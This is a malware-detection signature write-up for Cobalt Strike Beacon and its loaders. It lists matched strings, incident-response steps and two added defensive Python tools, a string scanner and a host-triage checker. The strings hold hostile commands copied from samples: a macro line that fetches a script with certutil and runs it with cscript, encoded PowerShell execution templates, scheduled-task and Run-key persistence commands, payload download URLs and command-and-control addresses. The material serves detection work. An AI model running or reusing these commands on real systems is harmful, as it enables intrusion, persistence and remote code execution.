Concrete signature match: Virus Tool - Tool used to create or modify malware for 32-bit Windows platform, family CobaltStrike
This detection identifies a Cobalt Strike Beacon payload or a loader that stages one. Cobalt Strike is a commercial adversary-emulation framework whose post-exploitation implant, Beacon, is widely abused by real intrusion operators, so a match should be treated as hands-on-keyboard activity rather than a commodity infection. The strings below span several stages of that tooling: persistence through a scheduled task (schtasks /Create /TN Tencentid /sc minute /MO 1, launching an executable from C:\Users\Public\Music), a Run key written with reg add whose value starts Rundll32.exe SHELL32.DLL,ShellExec_, and the UserInitMprLogonScript logon-script value; Beacon's post-exploitation jobs, which run in a spawned process and return their results over named pipes such as \\.\pipe\bypassuac, \\.\pipe\keylogger, \\.\pipe\hashdump, \\.\pipe\mimikatz, \\.\pipe\netview and \\.\pipe\portscan; the default Artifact Kit pipe MSSE-<n>-server and the default SMB Beacon pipe msagent_<hex>; WinINet HTTP command-and-control (HttpAddRequestHeadersA, HttpSendRequestA, InternetReadFile) with several hard-coded C2 addresses; Go and Nim loaders that check for a sandbox (sleep timing, physical memory, CPU count) before AES-CBC decrypting embedded shellcode; an Office macro that fetches a script with certutil -urlcache and runs it with cscript; and PDB paths such as Bypass_AV.pdb and AVBypass.pdb. Although the classification says 32-bit, the strings also cover x64 artifacts (artifact64big.dll, beacon.x64.dll). Any match indicates an active and severe system compromise.
Relevant strings associated with this threat (the tag after each string names the signature type it was matched in: PEHSTR and PEHSTR_EXT for strings inside PE files, MACROHSTR_EXT for strings inside Office macros, SNID for short byte fragments that carry no meaning on their own; the !#HSTR: entries reference other string signatures):
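An added example, not part of the original signature or of any vendor scanner: a small Python scanner that applies a subset of the strings listed below to a file image the way a PEHSTR-style string signature would. It checks both ASCII and UTF-16LE encodings (PE binaries carry either), weights hits by what they indicate, refuses to fire on weak strings such as .dll or GetCommandLineA alone, and extracts every \\.\pipe\ name from the image for use in a pipe-hunting rule on other hosts. The grouping, the weights, the threshold and the sample buffers are assumptions made for this example.

```python
import re
from collections import defaultdict

# Subset of the signature strings below, grouped by what they tell an analyst.
# Grouping and weights are assumptions for this example, not the vendor's logic.
INDICATORS = {
    "named_pipe": [r"\\.\pipe\bypassuac", r"\\.\pipe\keylogger", r"\\.\pipe\hashdump",
                   r"\\.\pipe\mimikatz", r"\\.\pipe\netview", r"\\.\pipe\portscan",
                   r"\\.\pipe\MSSE-", r"\\%s\pipe\msagent_%x"],
    "persistence": ["/Create /TN Tencentid /sc minute /MO 1",
                    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
                    "UserInitMprLogonScript"],
    "c2": ["HttpAddRequestHeadersA", "HttpSendRequestA", "InternetReadFile",
           "122.228.7.225", "122.193.130.74", "121.207.229.145"],
    "loader": ["shellcodeloading/checkSandbox", "crypto/cipher.NewCBCDecrypter",
               "Bypass_AV.pdb", "AVBypass.pdb", r"\Shellcode\ReflectiveLoader.pdb"],
    # Present in countless clean binaries: they corroborate, never trigger.
    "weak": ["GetCommandLineA", "GetCommandLineW", ".dll", "rundll32"],
}
WEIGHT = {"named_pipe": 3, "persistence": 3, "c2": 2, "loader": 2, "weak": 0}
THRESHOLD = 6  # assumed: two post-ex pipes, or a pipe plus a persistence string

# Pipe paths as they appear in a binary: \\.\pipe\<name>. %s and %x are format
# placeholders in Beacon's own templates and are allowed so they still match.
PIPE_RE = re.compile(r"\\\\\.\\pipe\\[A-Za-z0-9_%.\-]+")


def _encodings(s: str):
    # PE string tables and resource strings may be narrow or wide.
    return (s.encode("ascii"), s.encode("utf-16-le"))


def scan_image(image: bytes) -> dict:
    """Return per-class hits, the weighted score and whether the signature fires."""
    hits = defaultdict(set)
    for cls, strings in INDICATORS.items():
        for s in strings:
            if any(enc in image for enc in _encodings(s)):
                hits[cls].add(s)
    score = sum(WEIGHT[cls] * len(found) for cls, found in hits.items())
    return {"score": score, "match": score >= THRESHOLD,
            "hits": {cls: sorted(found) for cls, found in hits.items()}}


def extract_pipe_names(image: bytes) -> list:
    r"""Pull every \\.\pipe\<name> string out of the image, narrow or wide."""
    views = [image.decode("latin-1")]
    for off in (0, 1):  # wide strings may start at either byte alignment
        views.append(image[off:].decode("utf-16-le", errors="ignore"))
    names = set()
    for text in views:
        names.update(PIPE_RE.findall(text))
    return sorted(names)


def build_sample() -> bytes:
    """Constructed stand-in for a PE image; no real sample is embedded."""
    return b"".join([
        b"MZ\x90\x00" + b"\x00" * 60,
        b"GetCommandLineA\x00HttpSendRequestA\x00",
        b"\\\\.\\pipe\\MSSE-1966-server\x00",
        "/Create /TN Tencentid /sc minute /MO 1".encode("utf-16-le"),  # wide string
        b"\x00" * 32,
        b"122.193.130.74\x00",
        b"\\\\.\\pipe\\hashdump\x00",
    ])


def build_benign_sample() -> bytes:
    """Constructed clean-looking image carrying only weak strings, so no match."""
    return b"MZ\x90\x00" + b"GetCommandLineA\x00kernel32.dll\x00rundll32\x00"


if __name__ == "__main__":
    for label, img in (("suspect", build_sample()), ("benign", build_benign_sample())):
        r = scan_image(img)
        print(label, "match" if r["match"] else "clean", r["score"], r["hits"])
    print(extract_pipe_names(build_sample()))
```

The byte-level search is alignment-agnostic for the string checks; the regex pass decodes the wide view twice (from offset 0 and 1) so that a UTF-16 pipe name at an odd offset is still recovered. Run it against a real Beacon artifact to see which classes light up; the extracted pipe names feed directly into a host-side named-pipe hunt.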
- \cobaltstrike 3.14\payload\AvByPass (PEHSTR_EXT)
- S/F /Create /TN Tencentid /sc minute /MO 1 /TR C:\Users\Public\Music\tencentsoso.exe (PEHSTR)
- C:\Users\Public\Music\cia.plan (PEHSTR)
- !C:\Users\Public\Music\SideBar.dll (PEHSTR)
- artifact64big.dll (PEHSTR_EXT)
- artifact32big.dll (PEHSTR_EXT)
- K[ZKK\OKM (PEHSTR_EXT)
- GetCommandLineA (PEHSTR_EXT)
- GetCommandLineW (PEHSTR_EXT)
- \\.\pipe\MSSE-1966-server (PEHSTR_EXT)
- temp.dll (PEHSTR_EXT)
- ././., (PEHSTR_EXT)
- .,./., (PEHSTR_EXT)
- /posts/ (PEHSTR_EXT)
- /ivc/ (PEHSTR_EXT)
- /k&>}2 (SNID)
- QJM#/I (SNID)
- vN.6b (SNID)
- Microsoft Base Cryptographic Provider v1.0 (PEHSTR_EXT)
- HttpAddRequestHeadersA (PEHSTR_EXT)
- beacon.dll (PEHSTR_EXT)
- .dll (PEHSTR_EXT)
- \\.\pipe\bypassuac (PEHSTR_EXT)
- \\.\pipe\keylogger (PEHSTR_EXT)
- /send%s (PEHSTR_EXT)
- rcap:// (PEHSTR_EXT)
- \\.\pipe\netview (PEHSTR_EXT)
- \\.\pipe\powershell (PEHSTR_EXT)
- \\.\pipe\screenshot (PEHSTR_EXT)
- \\.\pipe\elevate (PEHSTR_EXT)
- \\.\pipe\hashdump (PEHSTR_EXT)
- Global\SAM (PEHSTR_EXT)
- \\.\pipe\portscan (PEHSTR_EXT)
- \\%s\ipc$ (PEHSTR_EXT)
- \\.\pipe\sshagent (PEHSTR_EXT)
- COBALTSTRIKE (PEHSTR_EXT)
- %1024[^ ] %8[^:]://%1016[^/]%7168 (PEHSTR_EXT)
- \\%s\pipe\msagent_%x (PEHSTR_EXT)
- [command] (PEHSTR_EXT)
- \\.\pipe\mimikatz (PEHSTR_EXT)
- test.dll (PEHSTR_EXT)
- shellcodeexecute (PEHSTR_EXT)
- Application.ShellExecute "cmd.exe", "/c certutil -urlcache -split -f https://docs.healthmade.org//tc.js ""%USERPROFILE%\\Documents\\tc.js"" && cscript ""%USERPROFILE%\\Documents\\tc.js"" && del ""%USERPROFILE%\\Documents\\tc.js"" ", "C:\Windows\System32" (MACROHSTR_EXT)
- CWEMRvwtJNovrrWsIwERjSjD (PEHSTR_EXT)
- AS\e\%r (SNID)
- could not run command (w/ token) because of its length of %d bytes! (PEHSTR_EXT)
- powershell -nop -exec bypass -EncodedCommand "%s" (PEHSTR_EXT)
- spawn::decrypting... (PEHSTR)
- \regedit.exe (PEHSTR)
- tps://122.228.7.225/admin?file= (PEHSTR_EXT)
- 122.193.130.74 (PEHSTR_EXT)
- 121.207.229.145 (PEHSTR_EXT)
- File Download Success. (PEHSTR_EXT)
- download.exe (PEHSTR_EXT)
- /checker (PEHSTR_EXT)
- YG@JG\ (PEHSTR_EXT)
- |ZB{]K\zF\KOJ}ZO\Z (PEHSTR_EXT)
- HTTP/1.1 200 OK (PEHSTR_EXT)
- %02d/%02d/%02d %02d:%02d:%02d (PEHSTR_EXT)
- CFy92ROzKls\ro\HwtAF.pdb (PEHSTR_EXT)
- r8BsHuPe56l\ilYp\i12tW5S7m3 (PEHSTR_EXT)
- /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v (PEHSTR_EXT)
- /t REG_SZ /d "Rundll32.exe SHELL32.DLL,ShellExec_ (PEHSTR_EXT)
- 7I.S_T (SNID)
- \>~gZ (SNID)
- shellcodeloading/checkSandbox.timeSleep (PEHSTR_EXT)
- shellcodeloading/checkSandbox.physicalMemory (PEHSTR_EXT)
- shellcodeloading/checkSandbox.numberOfCPU (PEHSTR_EXT)
- sync.(*Mutex).Lock (PEHSTR_EXT)
- crypto/cipher.xorBytes (PEHSTR_EXT)
- shellcodeloading/aes.AesDecrypt (PEHSTR_EXT)
- runtime.injectglist (PEHSTR_EXT)
- sync.(*Mutex).lockSlow (PEHSTR_EXT)
- sync.(*entry).load (PEHSTR_EXT)
- shellcodeloading/checkSandbox.CheckSandbox (PEHSTR_EXT)
- crypto/cipher.NewCBCDecrypter (PEHSTR_EXT)
- crypto/cipher.xorBytesSSE2 (PEHSTR_EXT)
- crypto/aes.decryptBlockGo (PEHSTR_EXT)
- 0.bin (PEHSTR_EXT)
- \Bypass_AV.pdb (PEHSTR_EXT)
- Bypass_AV.pdb (PEHSTR_EXT)
- InternetReadFile(...) (PEHSTR_EXT)
- HttpSendRequestA(...) (PEHSTR_EXT)
- /htEp (PEHSTR_EXT)
- oshi.at (PEHSTR_EXT)
- UserInitMprLogonScript (PEHSTR_EXT)
- %s as %s\%s: %d (PEHSTR_EXT)
- beacon.x64.dll (PEHSTR_EXT)
- Updater.dll (PEHSTR_EXT)
- Content-Type: application/octet-stream (PEHSTR_EXT)
- cmd /c C:\Windows\Temp (PEHSTR_EXT)
- DllGetClassObject (PEHSTR_EXT)
- DllRegisterServer (PEHSTR_EXT)
- \SLN\HRM_SUB\ (PEHSTR_EXT)
- \HRM_SUB.pdb (PEHSTR_EXT)
- AVBypass.pdb (PEHSTR_EXT)
- http_dll.dat (PEHSTR_EXT)
- //rs.qbox.me/chtype/ (PEHSTR_EXT)
- Dbak/chdb:qiniu.png (PEHSTR_EXT)
- 252.72.131.228 (PEHSTR_EXT)
- 240.232.200.0 (PEHSTR_EXT)
- 0.0.65.81 (PEHSTR_EXT)
- 65.80.82.81 (PEHSTR_EXT)
- 86.72.49.210 (PEHSTR_EXT)
- 101.72.139.82 (PEHSTR_EXT)
- set_UseShellExecute (PEHSTR_EXT)
- Aborting... (PEHSTR_EXT)
- -sta -noprofile -executionpolicy bypass -encodedcommand (PEHSTR_EXT)
- Press any key... (PEHSTR_EXT)
- http://144.48.240.85/18.exe (PEHSTR_EXT)
- 4Bejz8txQ/rDnf (PEHSTR_EXT)
- ShellCodeLoader\bin (PEHSTR_EXT)
- http://49.234.65.52/UpdateStream_x86.cab (PEHSTR_EXT)
- HttpWebRequest (PEHSTR_EXT)
- \x91\xe1\xa19 (PEHSTR_EXT)
- \xE9\xE8\Xa1 (PEHSTR_EXT)
- 0ZNA3EZ4g.exe (PEHSTR_EXT)
- 0ZNA3EZ4g.xlsx (PEHSTR_EXT)
- legacy.chunk.js (PEHSTR_EXT)
- windows\temp\ (PEHSTR_EXT)
- .exe (PEHSTR_EXT)
- getparagraphopendllpathforbinaryas1put1bclose1 (MACROHSTR_EXT)
- namefnzstasstatbase64decodexe1py3jvc29mdfxuzwftc1xjdxjyzw50etdsendifend (MACROHSTR_EXT)
- windows.ini (PEHSTR)
- mgur730yw1.dll (PEHSTR_EXT)
- \Parallel_Asis.dll (PEHSTR_EXT)
- mscorsvc.dll (PEHSTR_EXT)
- 1.dll (PEHSTR_EXT)
- Loader.nim (PEHSTR_EXT)
- bcmode.nim (PEHSTR_EXT)
- Test.dll (PEHSTR_EXT)
- \.\PhysicalDrive0 (PEHSTR_EXT)
- temp\packed64-temp.pdb (PEHSTR_EXT)
- \projects\garda\storage\targets\work6.x2.pdb (PEHSTR_EXT)
- .sedata (PEHSTR_EXT)
- .gehc (PEHSTR_EXT)
- Release\movenpeak.pdb (PEHSTR_EXT)
- System.Web.ni.dll (PEHSTR_EXT)
- 0cobaltstrike-chtsec (PEHSTR_EXT)
- DetectAttack.dll (PEHSTR_EXT)
- x64\Debug\DetectAttack.pdb (PEHSTR_EXT)
- powershell -nop -exec bypass -EncodedCommand (PEHSTR_EXT)
- nfvurg856lk63.dll (PEHSTR_EXT)
- programdata\3bef479.tmp (PEHSTR_EXT)
- Release\SetupEngine.pdb (PEHSTR_EXT)
- Applebaidugooglebingcsdnbokeyuanhelloworld.com (PEHSTR_EXT)
- ;\$ r (PEHSTR_EXT)
- DllMain (PEHSTR_EXT)
- PolicyPlus.Resources.resources (PEHSTR_EXT)
- %c%c%c%c%c%c%c%c%cnetsvc\ (PEHSTR_EXT)
- enhanced-google.com (PEHSTR_EXT)
- Control_RunDLL "C:\ProgramData\AxlnstSV\xlsrd.cpl (PEHSTR_EXT)
- E2/L9L$@ (PEHSTR_EXT)
- CymulateStagelessMeterpreterDll.dll (PEHSTR_EXT)
- \Cymulate\Agent\AttacksLogs\edr (PEHSTR_EXT)
- QlZylT5WMZcGIAyTUbSGnAerR.resources (PEHSTR_EXT)
- New Project 2.exe (PEHSTR_EXT)
- raw.githubusercontent.com/kk-echo123/aoisndoi/ (PEHSTR_EXT)
- .retplne (PEHSTR_EXT)
- wsc_UUIDS.dll (PEHSTR_EXT)
- D:\project\doge-cloud\targetfiles (PEHSTR_EXT)
- on_avast_dll_unload (PEHSTR_EXT)
- peloader\peloader_64\ (PEHSTR_EXT)
- \Release\peloader (PEHSTR_EXT)
- AtomLdr.dll (PEHSTR_EXT)
- A7d8Gw8XN////76uvq+trqm3zi2at3Stn7d0ree3dK3ft3SNr7fwSLW1ss42t84/U (PEHSTR_EXT)
- RunScript (PEHSTR_EXT)
- PoolAndSpaDepot.My.Resources (PEHSTR_EXT)
- test1\source\repos\download\x64\Release\download.pdb (PEHSTR_EXT)
- WindowsProject_bin.dll (PEHSTR)
- jsporvjlfsqmlsamxdrvitxha (PEHSTR_EXT)
- api.gogleapi.click/file/System/ (PEHSTR_EXT)
- Projects\evasionC_go\workingSpace (PEHSTR_EXT)
- _seh_filter_dll (PEHSTR_EXT)
- \Shellcode\ReflectiveLoader.pdb (PEHSTR_EXT)
- /|bD;X (SNID)
- MACOSX\pdf.pdf (PEHSTR_EXT)
- sync.(*RHe0UcdpHEv).RUnlock (PEHSTR_EXT)
- nX0mgbuOjw.(*wU6_Xfv4).bqwSOvr5m (PEHSTR_EXT)
- yCcdI7eVq.(*UE5TRl).xKFXpU5Cyab (PEHSTR_EXT)
- PT2MtVR9gr5.go (PEHSTR_EXT)
- CallDLLDynamic.pdb (PEHSTR_EXT)
- per_thread_data.cpp (PEHSTR_EXT)
- [*] Executing (PEHSTR_EXT)
- ConsoleApp1.exe (PEHSTR_EXT)
- n/q9) (SNID)
- krpt_RemoveDllFilterProtectDetour (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForSoftwarePacking.C!pli (PEHSTR_EXT)
Associated sample hash (SHA-256): 327629c21782f90f4bd5f7c0779d05e9dbe87244dbf6bbef6703293700f2a620
Recommended response: Treat a match as an active intrusion, not a commodity infection. Immediately isolate the compromised host from the network and preserve memory and disk images before any cleanup. Conduct a comprehensive forensic investigation to determine the initial compromise vector (the macro and certutil strings above point at a document lure; the Go and Nim loader strings at a dropped loader) and the extent of lateral movement. Remove every persistence mechanism named in the strings: the Tencentid scheduled task and the files under C:\Users\Public\Music it launches, HKCU Run values that start Rundll32.exe SHELL32.DLL,ShellExec_, and any UserInitMprLogonScript value under HKCU\Environment. Sweep other hosts for the same task name, for the MSSE-<n>-server and msagent_<hex> named pipes, and for connections to the listed command-and-control addresses. Because Beacon's hashdump and mimikatz jobs harvest credentials, reset all credentials that were usable from the host, starting with privileged and service accounts, and tighten endpoint detection and network egress monitoring to catch a return.
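An added example, not part of the original page: offline triage checks for the persistence and named-pipe artefacts the signature strings describe. Each check takes already-collected host data (a schtasks CSV export, Run-key and Environment registry values, a list of open named pipes) so it runs and can be tested without a Windows host; collect_live() shows how the same inputs are gathered on the host itself. The task name, staging directory, Run-value prefix and pipe patterns come from the strings above; the sample records are constructed for this example, and the schtasks column names and repeat format are assumptions that depend on the host's locale.

```python
import csv
import io
import re
import subprocess
import sys

# Artefacts named in the signature strings above.
TASK_NAME = "Tencentid"
STAGING_DIR = r"c:\users\public\music"
RUN_VALUE_MARK = "rundll32.exe shell32.dll,shellexec_"  # the signature string is cut here
LOGON_SCRIPT_VALUE = "UserInitMprLogonScript"           # lives under HKCU\Environment
PIPE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"^MSSE-\d+-server$",    # \\.\pipe\MSSE-1966-server (Artifact Kit default)
    r"^msagent_[0-9a-f]+$",  # \\%s\pipe\msagent_%x (SMB Beacon default)
    r"^(bypassuac|keylogger|netview|powershell|screenshot|elevate|hashdump"
    r"|portscan|sshagent|mimikatz)$",  # post-exploitation job pipes
)]


def suspicious_tasks(schtasks_csv: str) -> list:
    r"""Parse `schtasks /Query /FO CSV /V` output (assumed English column names)
    and flag tasks matching the signature: the Tencentid name, an action under
    C:\Users\Public\Music, or a one-minute repeat like `/sc minute /MO 1`."""
    findings = []
    for row in csv.DictReader(io.StringIO(schtasks_csv)):
        name = row.get("TaskName", "")
        action = row.get("Task To Run", "")
        reasons = []
        if name.rsplit("\\", 1)[-1].lower() == TASK_NAME.lower():
            reasons.append("task name from signature")
        if STAGING_DIR in action.lower():
            reasons.append("runs from C:\\Users\\Public\\Music")
        if row.get("Repeat: Every", "").strip() == "0:01:00":  # assumed format
            reasons.append("repeats every minute")
        if reasons:
            findings.append({"task": name, "action": action, "reasons": reasons})
    return findings


def suspicious_run_values(run_values: dict) -> dict:
    r"""HKCU\...\Run values launched via Rundll32.exe SHELL32.DLL,ShellExec_
    (the `reg add ... /t REG_SZ /d` strings) or from the staging directory."""
    return {name: data for name, data in run_values.items()
            if RUN_VALUE_MARK in data.lower() or STAGING_DIR in data.lower()}


def logon_script(env_values: dict):
    r"""HKCU\Environment\UserInitMprLogonScript runs at logon and is normally absent."""
    return env_values.get(LOGON_SCRIPT_VALUE)


def suspicious_pipes(pipe_names) -> list:
    """Open named pipes whose names match Beacon defaults or post-ex job pipes."""
    return [p for p in pipe_names if any(rx.search(p) for rx in PIPE_PATTERNS)]


def triage(schtasks_csv, run_values, env_values, pipe_names) -> dict:
    return {"tasks": suspicious_tasks(schtasks_csv),
            "run_values": suspicious_run_values(run_values),
            "logon_script": logon_script(env_values),
            "pipes": suspicious_pipes(pipe_names)}


def collect_live():
    """Gather the same four inputs on the host itself (Windows only)."""
    if sys.platform != "win32":
        raise RuntimeError("live collection needs a Windows host")
    import os, winreg
    tasks = subprocess.run(["schtasks", "/Query", "/FO", "CSV", "/V"],
                           capture_output=True, text=True, check=True).stdout

    def read_values(subkey):
        values = {}
        try:
            with winreg.OpenKey(winreg.HKEY_CURRENT_USER, subkey) as key:
                i = 0
                while True:
                    try:
                        name, data, _ = winreg.EnumValue(key, i)
                    except OSError:
                        break
                    values[name] = str(data)
                    i += 1
        except OSError:
            pass
        return values
    run = read_values(r"Software\Microsoft\Windows\CurrentVersion\Run")
    env = read_values("Environment")
    pipes = os.listdir(r"\\.\pipe\\")  # enumerates open named pipes on Windows
    return tasks, run, env, pipes


# Constructed sample host data, not from a real incident.
SAMPLE_SCHTASKS_CSV = (
    '"TaskName","Task To Run","Repeat: Every"\n'
    '"\\Tencentid","C:\\Users\\Public\\Music\\tencentsoso.exe","0:01:00"\n'
    '"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","%windir%\\system32\\defrag.exe -c","N/A"\n'
)
SAMPLE_RUN_VALUES = {
    "OneDrive": '"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background',
    "Updater": "Rundll32.exe SHELL32.DLL,ShellExec_RunDLL C:\\Users\\Public\\Music\\SideBar.dll",
}
SAMPLE_ENV_VALUES = {"TEMP": "%USERPROFILE%\\AppData\\Local\\Temp",
                     "UserInitMprLogonScript": "C:\\Users\\Public\\Music\\tencentsoso.exe"}
SAMPLE_PIPES = ["InitShutdown", "lsass", "MSSE-1966-server", "msagent_7f3a", "hashdump", "ntsvcs"]

if __name__ == "__main__":
    live = sys.platform == "win32" and "--live" in sys.argv
    args = collect_live() if live else (SAMPLE_SCHTASKS_CSV, SAMPLE_RUN_VALUES,
                                        SAMPLE_ENV_VALUES, SAMPLE_PIPES)
    for key, value in triage(*args).items():
        print(f"{key}: {value}")
```

Run without arguments to see the checks fire on the constructed data; on a Windows host, `python triage.py --live` runs them against the real task list, registry and pipe namespace. The matcher only needs the Rundll32.exe SHELL32.DLL,ShellExec_ prefix that the signature string contains, so the full export name in the sample value is not relied upon.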